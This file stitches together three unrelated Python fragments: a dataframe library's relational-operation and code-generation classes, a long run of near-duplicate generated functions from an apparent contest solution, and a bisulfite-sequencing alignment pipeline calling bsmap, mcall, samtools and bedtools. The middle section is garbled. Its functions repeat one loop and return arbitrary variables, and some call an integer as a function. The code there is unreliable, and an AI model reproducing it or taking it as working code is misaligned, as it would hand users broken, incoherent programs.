def __init__(self, columns: ColumnSelection, child: RelationalOp):
self.op_type = RelationalOpType.project
self.columns = columns
self.child = child
def __repr__(self):
return f"{{{self.op_type.value}: {{columns:{self.columns}, of: {self.child}}}}}"
class GroupBy(RelationalOp):
def __init__(self, columns: ColumnSelection, collect, child: RelationalOp):
self.op_type = RelationalOpType.groupby
self.columns = columns
self.collect = collect
self.child = child
def __repr__(self):
return f"{{{self.op_type.value}: {{columns:{self.columns}, collect:{self.collect}, child: {self.child}}}}}"
class Where(RelationalOp):
def __init__(self, predicate: Predicate, child: RelationalOp):
self.op_type = RelationalOpType.where
self.predicate = predicate
self.child = child
def __repr__(self):
return f"{{{self.op_type.value}: {{predicate:{self.predicate}, of: {self.child}}}}}"
class Join(RelationalOp):
"""[summary]
Arguments:
self_columns {ColumnSelection} -- columns of the df to join on
other {MidasDataFrame} -- other df
other_columns {ColumnSelection} -- column from other df
child {RelationalOp} -- previous operation that produces "self"
note that other is a MidasDataFrame because at code gen time we need to knwo their names (but this is not the case for the self. #FIXME seems weird)
"""
def __init__(self, self_columns: ColumnSelection, other: MidasDataFrame, other_columns: ColumnSelection, child: RelationalOp):
self.op_type = RelationalOpType.join
self.self_columns = self_columns
self.other = other
self.other_columns = other_columns
self.child = child
def __repr__(self):
return f"{{{self.op_type.value}: {{left: {self.child}, right: {self.other._ops}, on: {self.self_columns},{self.other_columns}}}}}"
# Note, place here because of cyclic imports : (
class DFInfo(object):
def __init__(self, df: MidasDataFrame):
# df is the immediate df that might be filtered by each tick
self.df = df
self.created_on = datetime.now()
self.df_type = "original"
# def update_df(self, df: Optional[MidasDataFrame]) -> bool:
# raise InternalLogicalError("Should not attempt to update base dataframes")
class VisualizedDFInfo(DFInfo):
def __init__(self, df: MidasDataFrame):
if not df.df_name:
raise InternalLogicalError("Visualized dfs must have df_names")
self.df = df
self.created_on = datetime.now()
self.df_name = df.df_name
# original df is that which was defined at the beginning
self.original_df = df
self.df_type = "visualized"
# self.predicates: List[SelectionEvent] = []
def update_df(self, df: Optional[MidasDataFrame]) -> bool:
"""
Arguments:
df {MidasDataFrame} -- the dataframe to be updated with
Returns:
bool -- whether the dataframe has changed
"""
if df is not None and self.df is not None and self.df._id == df._id:
return False
self.df = df
return True
def __repr__(self) -> str:
return f"df_info for {self.original_df.df_name}"
def get_midas_code(op: RelationalOp, midas_reference_name: str) -> str:
if op.op_type == RelationalOpType.base:
b_op = cast(BaseOp, op)
return b_op.df_name
else:
prev_table = get_midas_code(op.child, midas_reference_name)
if op.op_type == RelationalOpType.where:
s_op = cast(Where, op)
col_or_label = convert_value_or_predicate(
s_op.predicate.column_or_label,
midas_reference_name
)
val_or_pred = convert_value_or_predicate(
s_op.predicate.value_or_predicate,
midas_reference_name
)
if s_op.predicate.other is None:
return f"{prev_table}.where({col_or_label}, {val_or_pred})"
else:
other = convert_value_or_predicate(
s_op.predicate.other,
midas_reference_name
)
return f"{prev_table}.where({col_or_label}, {val_or_pred}, {other})"
if op.op_type == RelationalOpType.project:
p_op = cast(Select, op)
new_table = f"{prev_table}.select({p_op.columns!r})"
return new_table
if op.op_type == RelationalOpType.groupby:
g_op = cast(GroupBy, op)
if g_op.collect is None:
return f"{prev_table}.group({g_op.columns!r})"
else:
group_fun = get_lambda_declaration_or_fn_name(g_op.collect)
return f"{prev_table}.group({g_op.columns!r}, {group_fun})"
if op.op_type == RelationalOpType.join:
j_op = cast(Join, op)
join_prep_code = ""
# we assume that the other has data!
if j_op.other.df_name is not None:
other_df_name = j_op.other.df_name
else:
if not(hasattr(j_op.other, "_suggested_df_name") or hasattr(j_op.other._suggested_df_name, "_suggested_df_name")):
raise InternalLogicalError("the join df should have a suggested name")
ops_code = get_midas_code(j_op.other._ops, midas_reference_name)
join_prep_code = f"{j_op.other._suggested_df_name} = {ops_code}"
other_df_name = j_op.other._suggested_df_name
new_table = f"{join_prep_code}\n{prev_table}.join({j_op.self_columns!r}, {other_df_name}, {j_op.other_columns!r})"
return new_table
else:
raise NotImplementedError(op.op_type)
def convert_value_or_predicate(val_or_pred, midas_reference_name) -> str:
"""Convert a value or predicate into a code string.
val_or_red: intended to be a function or callable from the
datascience.predicates module
"""
if val_or_pred is None:
return "None"
elif inspect.getmodule(val_or_pred) and inspect.getmodule(val_or_pred).__name__ == 'datascience.predicates':
# Get the parameters of the predicate
closure_vars = inspect.getclosurevars(val_or_pred.f).nonlocals
# Create the assignment of parameters
# assignments = ", ".join(f"{k}={v}" for k, v in closure_vars.items())
assignments = ", ".join(f"{v}" for _, v in closure_vars.items())
_, line_no = inspect.getsourcelines(val_or_pred)
lines, _ = inspect.findsource(inspect.getmodule(val_or_pred))
atok = asttokens.ASTTokens("".join(lines), parse=True)
# Consider the possible predicate functions this could be
function_nodes = filter(
lambda node: isinstance(node, ast.FunctionDef)
and node.lineno < line_no, ast.walk(atok.tree)
)
# The correct predicate function has the greatest line number
# smaller than the lineno (lineno is a line number of a line of code
# within the correct predicate function)
f = max(function_nodes, key=operator.attrgetter("lineno")).name # type: ignore
return f"{midas_reference_name}.are.{f}({assignments})"
elif inspect.isfunction(val_or_pred):
return get_lambda_declaration_or_fn_name(val_or_pred)
else:
return repr(val_or_pred)
def get_lambda_declaration_or_fn_name(fn: Callable) -> str:
if fn is None:
return "None"
if fn.__name__ == "<lambda>":
source = inspect.getsource(fn)
atok = asttokens.ASTTokens(source, parse=True)
attr_node = next(n for n in ast.walk(atok.tree) if isinstance(n, ast.Lambda))
start, end = attr_node.first_token.startpos, attr_node.last_token.endpos # type: ignore
return source[start: end]
else:
return fn.__name__
def eval_op(op: RelationalOp) -> Optional[Table]:
# note that some of the ops would simply return
if op.op_type == RelationalOpType.base:
b_op = cast(BaseOp, op)
return b_op.table
else:
prev_table = eval_op(op.child)
if not prev_table:
return None
if op.op_type == RelationalOpType.where:
s_op = cast(Where, op)
new_table = prev_table.where(s_op.predicate.column_or_label, s_op.predicate.value_or_predicate, s_op.predicate.other)
return new_table
if op.op_type == RelationalOpType.project:
p_op = cast(Select, op)
new_table = prev_table.select(p_op.columns)
return new_table
if op.op_type == RelationalOpType.groupby:
g_op = cast(GroupBy, op)
new_table = prev_table.group(g_op.columns, g_op.collect)
return new_table
if op.op_type == RelationalOpType.join:
j_op = cast(Join, op)
new_table = prev_table.join(j_op.self_columns, j_op.other.table, j_op.other_columns)
return new_table
else:
raise NotImplementedError(op.op_type)
def create_predicate(s: SelectionValue) -> Predicate:
col_name = s.column.col_name
# if s.selection_type == SelectionType.single_value:
# sv = cast(SingleValueSelection, s)
# return Predicate(col_name, sv.val)
if s.selection_type == SelectionType.numeric_range:
nv = cast(NumericRangeSelection, s)
p_func = are.between_or_equal_to(nv.minVal, nv.maxVal)
return Predicate(col_name, p_func)
elif s.selection_type == SelectionType.string_set:
ssv = cast(SetSelection, s)
p_func = are.contained_in(ssv.val)
return Predicate(col_name, p_func)
else:
raise NotAllCaseHandledError(f"Got {s.selection_type}, and we only support {SelectionType.string_set}, {SelectionType.numeric_range}, and {SelectionType.single_value}")
# helper tables placed here due to import issues
def get_selectable_column(mdf: MidasDataFrame)->Set[str]:
# if anything is the result of groupby aggregation
columns_grouped | |
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return totalsum
def func_a0601ae8aa534f048cb6098f9f85db51(N, A):
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return total
def func_c952a48a25e247f8be18eabaf023cdfd(N, A):
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return i
def func_835332840fcf4d8e917feeca658aec77(N, A):
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return a
def func_1a6aa03d8fed4735b6c35cda31b064e8(N, A):
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return best
def func_41a16dbe9ef949c3a0325a4933038f16(N, A):
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
return b
def func_297acb7c309b46209e1a96b19a82e91a(T, N, total, A):
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)
return a
def func_8c735db321ef4188a222ecdcd7b2efe8(T, N, total, A):
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)
return b
def func_dd31827642ae4575831fe6cda5a39b91(T, N, total, A):
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)
return best
def func_1d7e4a5716a44b22a2305573c28676a1(T, N, total, A):
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)
return totalsum
def func_c4ac65d1931343bb9b6e996ad4152ef3(T, N, total, A):
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)
return i
def func_f27c58c7cc4d4147a89c1096958515f5(T, N, total, totalsum):
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)('Case #%d: %.10f' % (T, 1.0 * best /
total))
return best
def func_e62fe36dc80e44a0a41bea416e4f92f1(T, N, total, totalsum):
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)('Case #%d: %.10f' % (T, 1.0 * best /
total))
return a
def func_e11294462e2445489b52e6b0eed435ee(T, N, total, totalsum):
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)('Case #%d: %.10f' % (T, 1.0 * best /
total))
return i
def func_49924ab686004a759bf4948f2bb194d6(T, N, total, totalsum):
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best('Case #%d' % T)('Case #%d: %.10f' % (T, 1.0 * best /
total))
return b
def func_75b0e58d5c2046e0bb5b1406882523c4(infile):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b +
1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
return r
def func_4e2e5c8fcc194f20993cddfdc052c55a(infile):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b | |
#!/usr/bin/env python3
# vim: set noexpandtab tabstop=2 shiftwidth=2 softtabstop=-1 fileencoding=utf-8:
__version__ = "0.0.3.2"
import os
import sys
import argparse
import yaml
import subprocess
def runcmd(cmd, log=subprocess.PIPE, echo=False):
if echo:
print('Running: ' + cmd)
try:
cp=subprocess.run('bash -c "%s"' % cmd, universal_newlines=True, shell=True, stdout=log, stderr=subprocess.STDOUT)
if cp.returncode != 0:
print('Error: %s failed.' % cmd, vars(cp), sep='\n', file=sys.stderr)
sys.exit(-1)
except OSError as e:
print("Execution failed: ", e, file=sys.stderr)
sys.exit(-1)
return cp
def runcmdsh(cmd, log=subprocess.PIPE, echo=False):
if echo:
print('Running: ' + cmd)
try:
cp=subprocess.run(cmd, universal_newlines=True, shell=True, stdout=log, stderr=subprocess.STDOUT)
if cp.returncode != 0:
print('Error: %s failed.' % cmd, vars(cp), sep='\n', file=sys.stderr)
sys.exit(-1)
except OSError as e:
print("Execution failed: ", e, file=sys.stderr)
sys.exit(-1)
return cp
def makedirectory(path, echo=False):
runcmd('mkdir -p %s' % (os.path.dirname(path) or '.'), echo=echo)
def lnfile(infile, outfile, verbose=False):
if os.path.exists(outfile):
return
makedirectory(outfile, verbose)
runcmd('ln -sf %s %s' % (infile, outfile), echo=verbose)
def bsmap_runcmd(fname, reference, numthread, outfile, verbose=False):
if os.path.exists(outfile):
return
makedirectory(outfile, verbose)
cmd = 'bsmap -a %s -d %s -n 1 -r 0 -S 1234 -p %d -o %s' % (fname, reference, numthread, outfile)
runcmd(cmd, log=open(outfile+".stdout", 'w+'), echo=verbose)
def bsmap_runcmd_pe(fname1, fname2, reference, numthread, outfile, verbose=False):
if os.path.exists(outfile):
return
makedirectory(outfile, verbose)
cmd = 'bsmap -a %s -b %s -d %s -n 1 -r 0 -S 1234 -p %d -o %s' % (fname1, fname2, reference, numthread, outfile)
runcmd(cmd, log=open(outfile+".stdout", 'w+'), echo=verbose)
def bsmap_ref(config, reference):
outbasedir=os.path.join(config['resultdir'], 'bsmap', reference)
for sampleinfo in config['sampleinfo']:
outfile=os.path.join(outbasedir, sampleinfo['sampleid'] + '.bam')
if os.path.exists(outfile):
continue
if 'inputbam' in config['aligninfo'] and config['aligninfo']['inputbam']: # input BAM files
if len(sampleinfo[reference]) > 1:
runcmd('samtools merge ' + outfile + ' ' + ' '.join(sampleinfo[reference]), echo=config['aligninfo']['verbose'])
else:
fname=sampleinfo[reference][0]
lnfile(fname, outfile, config['aligninfo']['verbose'])
else:
if len(sampleinfo['filenames']) > 1:
files = ''
for f in sampleinfo['filenames']:
bname=os.path.splitext(os.path.splitext(os.path.basename(f))[0])[0];
fname=f
singlefile=os.path.join(outbasedir, 'single', bname + '.bam')
bsmap_runcmd(fname, config['aligninfo'][reference], config['aligninfo']['numthreads'], singlefile)
files += ' ' + singlefile
runcmd('samtools merge ' + outfile + ' ' + files, echo=config['aligninfo']['verbose'])
else:
fname=sampleinfo['filenames'][0]
bsmap_runcmd(fname, config['aligninfo'][reference], config['aligninfo']['numthreads'], outfile, config['aligninfo']['verbose'])
import re
def bsmap_stat_parse(infile):
if not os.path.exists(infile):
return (0, 0, 0)
with open(infile) as f:
dstr=f.read()
totalreads=int(re.search('total reads: (\d+)', dstr).groups()[0])
alignedreads=int(re.search('aligned reads: (\d+)', dstr).groups()[0])
uniquereads=int(re.search('unique reads: (\d+)', dstr).groups()[0])
return (totalreads, alignedreads, uniquereads)
def bam_numreads(infile):
if not os.path.exists(infile):
return 0
cmd='samtools view -c %s' % infile
cp=runcmdsh(cmd)
return int(cp.stdout.strip())
def bsmap_stat(config, reference):
basedir=os.path.join(config['resultdir'], 'bsmap')
stats = {}
if 'inputbam' in config['aligninfo'] and config['aligninfo']['inputbam']:
for sampleinfo in config['sampleinfo']:
if 'filenames' in sampleinfo and len(sampleinfo['filenames']) > 1:
totalr=0
for fname in sampleinfo['filenames']:
bname=os.path.splitext(os.path.splitext(os.path.basename(fname))[0])[0];
f=os.path.join(basedir, reference, 'single', bname + '.bam')
totalr += bam_numreads(f)
stats[sampleinfo['sampleid']] = (totalr, totalr, totalr)
else:
f=os.path.join(basedir, reference, sampleinfo['sampleid'] + '.bam')
totalr=bam_numreads(f)
stats[sampleinfo['sampleid']] = (totalr, totalr, totalr)
else:
for sampleinfo in config['sampleinfo']:
if 'filenames' in sampleinfo and len(sampleinfo['filenames']) > 1:
totalr=0
alignedr=0
uniquer=0
for fname in sampleinfo['filenames']:
bname=os.path.splitext(os.path.splitext(os.path.basename(fname))[0])[0];
f=os.path.join(basedir, reference, 'single', bname + '.bam.stdout')
ftotalr, falignedr, funiquer = bsmap_stat_parse(f)
totalr += ftotalr
alignedr += falignedr
uniquer += funiquer
stats[sampleinfo['sampleid']] = (totalr, alignedr, uniquer)
else:
f=os.path.join(basedir, reference, sampleinfo['sampleid'] + '.bam.stdout')
stats[sampleinfo['sampleid']] = bsmap_stat_parse(f)
return stats
def bsmap(config):
if config['aligninfo']['verbose']:
print('==>bsmap<==')
mpstat = {}
bsmap_ref(config, 'reference')
mpstat['reference'] = bsmap_stat(config, 'reference')
if config['aligninfo']['usespikein']:
bsmap_ref(config, 'spikein')
mpstat['spikein'] = bsmap_stat(config, 'spikein')
if config['aligninfo']['verbose']:
print(mpstat)
return mpstat
def mcall_stat_parse(infile):
if not os.path.exists(infile):
return 0
with open(infile) as f:
dstr=f.read()
return float(re.search('bisulfite conversion ratio = ([\d.]+)', dstr).groups()[0])
def mcall_runcmd(infile, outdir, sampleid, reference, numthread, verbose=False):
linkfile=os.path.join(outdir, sampleid + '.bam')
statfile=linkfile+'_stat.txt'
if os.path.exists(statfile):
return mcall_stat_parse(statfile)
lnfile(os.path.abspath(infile), linkfile)
cmd = 'cd %s && mcall -m %s -r %s --sampleName %s -p %s' % (os.path.dirname(linkfile), os.path.basename(linkfile), reference, sampleid, numthread)
runcmd(cmd, log=open(linkfile+".stdout", 'w+'), echo=verbose)
return mcall_stat_parse(statfile)
def mcall_ref(config, reference):
inbasedir=os.path.join(config['resultdir'], 'bsmap', reference)
outbasedir=os.path.join(config['resultdir'], 'mcall', reference)
stats = {}
for sampleinfo in config['sampleinfo']:
infile=os.path.join(inbasedir, sampleinfo['sampleid'] + '.bam')
outdir=os.path.join(outbasedir, sampleinfo['sampleid'])
stats[sampleinfo['sampleid']] = mcall_runcmd(infile
, outdir
, sampleinfo['sampleid']
, config['aligninfo'][reference]
, config['aligninfo']['numthreads']
, config['aligninfo']['verbose']
)
return stats
def mcall(config):
if config['aligninfo']['verbose']:
print('==>mcall<==')
mcstat = {}
mcstat['reference'] = mcall_ref(config, 'reference')
if config['aligninfo']['usespikein']:
mcstat['spikein'] = mcall_ref(config, 'spikein')
if config['aligninfo']['verbose']:
print(mcstat)
return mcstat
def removeCommonReads_runcmd(infile1, infile2, outfile1, outfile2, verbose=False):
bin=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'perl', 'removeCommonRead.pl')
makedirectory(outfile1)
makedirectory(outfile2)
outsam1=outfile1+".sam"
outsam2=outfile2+".sam"
cmd = bin + ' ' + infile1 + ' ' + infile2 + ' ' + outsam1 + ' ' + outsam2
cp=runcmd(cmd, echo=verbose)
runcmd('samtools view -bS -o %s %s' % (outfile1, outsam1))
runcmd('samtools view -bS -o %s %s' % (outfile2, outsam2))
runcmd('rm -f %s %s' % (outsam1, outsam2))
return int(cp.stdout.strip())
def removeCommonReads(config):
if config['aligninfo']['verbose']:
print('==>removeCommonReads<==')
inbasedir=os.path.join(config['resultdir'], 'bsmap')
outbasedir=os.path.join(config['resultdir'], 'removeCommonReads')
comm={}
for sampleinfo in config['sampleinfo']:
refinfile=os.path.join(inbasedir, 'reference', sampleinfo['sampleid'] + '.bam')
spkinfile=os.path.join(inbasedir, 'spikein', sampleinfo['sampleid'] + '.bam')
refoutfile=os.path.join(outbasedir, 'reference', sampleinfo['sampleid'] + '.bam')
spkoutfile=os.path.join(outbasedir, 'spikein', sampleinfo['sampleid'] + '.bam')
comm[sampleinfo['sampleid']] = removeCommonReads_runcmd(refinfile, spkinfile, refoutfile, spkoutfile, config['aligninfo']['verbose'])
if config['aligninfo']['verbose']:
print(comm)
return comm
def totalwigsums_n(f):
cmd = "bedtools genomecov -ibam %s -bg | awk -v FS='\\t' -v OFS='\\t' -e 'BEGIN { sum=0 } { sum += $4*($3-$2) } END { print sum }'" % f
cp=runcmdsh(cmd)
return int(cp.stdout.strip())
def totalwigsums(config):
if config['aligninfo']['verbose']:
print('==>totalwigsums<==')
inbasedir=os.path.join(config['resultdir'], 'removeCommonReads' if config['aligninfo']['usespikein'] else 'bsmap')
twss = {}
for reference in ['reference', 'spikein'] if config['aligninfo']['usespikein'] else ['reference']:
tws = {}
for sampleinfo in config['sampleinfo']:
f=os.path.join(inbasedir, reference, sampleinfo['sampleid'] + '.bam')
tws[sampleinfo['sampleid']] = totalwigsums_n(f)
twss[reference] = tws
if config['aligninfo']['verbose']:
print(twss)
return twss
import statistics
def estimateSizeFactors(tws, verbose=False):
if verbose:
print('==>estimateSizeFactors<==')
mws = statistics.median(tws.values())
sizefactors = {id : mws / ws for id, ws in tws.items()}
if verbose:
print(sizefactors)
return sizefactors
def normalizetwsref(tws, sizefactors, verbose=False):
if verbose:
print('==>normalizetwsref<==')
twsn = {id: ws * sizefactors[id] for id, ws in tws.items()}
if verbose:
print(twsn)
return twsn
def saveQCstats(config, statfile, qcstats):
with open(statfile, 'w+') as f:
if config['aligninfo']['usespikein']:
print('\t'.join((
'sample_id'
, 'total'
, 'unique_ref'
, 'ref/total'
, 'unique_spk'
, 'spk/total'
, 'comm'
, 'comm/total'
, 'comm/unique_ref'
, 'twss_spk'
, 'sizefactors'
, 'twss_ref'
, 'twss_ref_norm'
, 'bcr_ref'
, 'bcr_spk'
)), file=f)
for sampleinfo in config['sampleinfo']:
sampleid = sampleinfo['sampleid']
total = qcstats['mpstat']['reference'][sampleid][0] if sampleid in qcstats['mpstat']['reference'] else 0
unique_ref = qcstats['mpstat']['reference'][sampleid][2] if sampleid in qcstats['mpstat']['reference'] else 0
unique_spk = qcstats['mpstat']['spikein'][sampleid][2] if sampleid in qcstats['mpstat']['reference'] else 0
comm = qcstats['comm'][sampleid]
twss_spk = qcstats['twss']['spikein'][sampleid]
sizefactors = qcstats['sizefactors'][sampleid]
twss_ref = qcstats['twss']['reference'][sampleid]
twss_ref_norm = qcstats['twsrefnorm'][sampleid]
bcr_ref = qcstats['mcstat']['reference'][sampleid]
bcr_spk = qcstats['mcstat']['spikein'][sampleid]
print('\t'.join(map(str
, (sampleid
, total
, unique_ref
, '{:.2%}'.format(unique_ref/total) if total>0 else 'NA'
, unique_spk
, '{:.2%}'.format(unique_spk/total) if total>0 else 'NA'
, comm
, '{:.2%}'.format(comm/total) if total>0 else 'NA'
, '{:.2%}'.format(comm/unique_ref) if unique_ref>0 else 'NA'
, twss_spk
, '{:.2f}'.format(sizefactors)
, twss_ref
, '{:.0f}'.format(twss_ref_norm)
, '{:.6f}'.format(bcr_ref)
, '{:.6f}'.format(bcr_spk)
)
)), file=f)
else:
print('\t'.join((
'sample_id'
, 'total'
, 'unique_ref'
, 'ref/total'
, 'twss_ref'
, 'sizefactors'
, 'twss_ref_norm'
, 'bcr_ref'
)), file=f)
for sampleinfo in config['sampleinfo']:
sampleid = sampleinfo['sampleid']
total = qcstats['mpstat']['reference'][sampleid][0] if sampleid in qcstats['mpstat']['reference'] else 0
unique_ref = qcstats['mpstat']['reference'][sampleid][2] if sampleid in qcstats['mpstat']['reference'] else 0
twss_ref = qcstats['twss']['reference'][sampleid]
sizefactors = qcstats['sizefactors'][sampleid]
twss_ref_norm = qcstats['twsrefnorm'][sampleid]
bcr_ref = qcstats['mcstat']['reference'][sampleid]
print('\t'.join(map(str
, (sampleid
, total
, unique_ref
, '{:.2%}'.format(unique_ref/total) if total>0 else 'NA'
, twss_ref
, '{:.2f}'.format(sizefactors)
, '{:.0f}'.format(twss_ref_norm)
, '{:.6f}'.format(bcr_ref)
)
)), file=f)
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
def barplot(config, tws):
outfile=os.path.join(config['resultdir'], config['aligninfo']['barplotinfo']['outfile'])
plt.figure(figsize=(config['aligninfo']['barplotinfo']['width'], config['aligninfo']['barplotinfo']['height']))
ax=plt.axes()
ax.yaxis.set_major_formatter(plt.FuncFormatter(lambda x, loc: '{:,}'.format(int(x))))
plt.bar(*zip(*tws.items()), width=0.5, color='blue')
plt.title('Normalized total wigsum')
makedirectory(outfile)
plt.savefig(outfile, bbox_inches='tight')
def removedupref(config):
if config['aligninfo']['verbose']:
print('==>removedupref<==')
indir=os.path.join(config['resultdir'], 'removeCommonReads' if config['aligninfo']['usespikein'] else 'bsmap', 'reference')
outdir=os.path.join(config['resultdir'], 'removedupref')
for sampleinfo in config['sampleinfo']:
infile=os.path.join(indir, sampleinfo['sampleid'] + '.bam')
outfile=os.path.join(outdir, sampleinfo['sampleid'] + '.bam')
makedirectory(outfile)
runcmd('samtools rmdup -s %s %s' % (infile, outfile), echo=config['aligninfo']['verbose'])
def bamtobed(config):
if config['genomescaninfo']['verbose']:
print('==>bamtobed<==')
indir=os.path.join(config['resultdir'], 'removedupref')
outdir=os.path.join(config['resultdir'], 'bamtobed')
for sampleinfo in config['sampleinfo']:
infile=os.path.join(indir, sampleinfo['sampleid'] + '.bam')
outfile=os.path.join(outdir, sampleinfo['sampleid'] + '.bed')
if os.path.exists(outfile):
continue
makedirectory(outfile)
runcmd('bedtools bamtobed -i %s > %s' % (infile, outfile))
return outdir
def readextension(config):
if config['genomescaninfo']['verbose']:
print('==>readextension<==')
indir=os.path.join(config['resultdir'], 'bamtobed')
outdir=os.path.join(config['resultdir'], 'readextension_frag'+str(config['genomescaninfo']['fragsize']))
for sampleinfo in config['sampleinfo']:
infile=os.path.join(indir, sampleinfo['sampleid'] + '.bed')
outfile=os.path.join(outdir, sampleinfo['sampleid'] + '.bed')
if os.path.exists(outfile):
continue
makedirectory(outfile)
cmd="awk -v FS='\\t' -v OFS='\\t' -v fragsize=%s -e '{ if ($6==\"+\") { $3=$2+fragsize } else if ($6==\"-\") { $2=$3-fragsize; if($2<0) { $2=0 } } print }' < %s > %s" % (
config['genomescaninfo']['fragsize'], infile, outfile)
runcmdsh(cmd, config['genomescaninfo']['verbose'])
return outdir
def fetchChromSizes(config):
outfile=os.path.join(config['resultdir'], config['genomescaninfo']['referencename'] + '_genomefile.txt')
if os.path.exists(outfile):
return outfile
makedirectory(outfile)
runcmd('fetchChromSizes %s > %s' % (config['genomescaninfo']['referencename'], outfile), echo=config['genomescaninfo']['verbose'])
return outfile
def makewindows(genomefile, windowsize, windowfile):
makedirectory(windowfile)
runcmd('bedtools makewindows -g %s -w %s | sort -k 1,1 -k 2,2n -k 3,3n > %s' % (genomefile, windowsize, windowfile))
import tempfile
def tabulatereadcounts(config, windowfile, beddir, counttablefile):
if config['genomescaninfo']['verbose']:
print('==>tabulatereadcounts<==')
cntdir=tempfile.TemporaryDirectory(dir=config['resultdir']).name
for sampleinfo in config['sampleinfo']:
infile=os.path.join(beddir, sampleinfo['sampleid'] + '.bed')
outfile=os.path.join(cntdir, sampleinfo['sampleid'] + '.bedgraph')
makedirectory(outfile)
cmd = "bedtools coverage -a %s -b %s -counts | awk -v FS='\\t' -v OFS='\\t' -e '$4>0' > %s" % (windowfile, infile, outfile)
runcmdsh(cmd, config['genomescaninfo']['verbose'])
sampleids=[sampleinfo['sampleid'] for sampleinfo in config['sampleinfo']]
fs=[os.path.join(cntdir, id+'.bedgraph') for id in sampleids]
makedirectory(counttablefile)
runcmd("bedtools unionbedg -i %s -header -names %s | gzip -n > %s" % (' '.join(fs), ' '.join(sampleids), counttablefile), echo=config['genomescaninfo']['verbose'])
for sampleinfo in config['sampleinfo']:
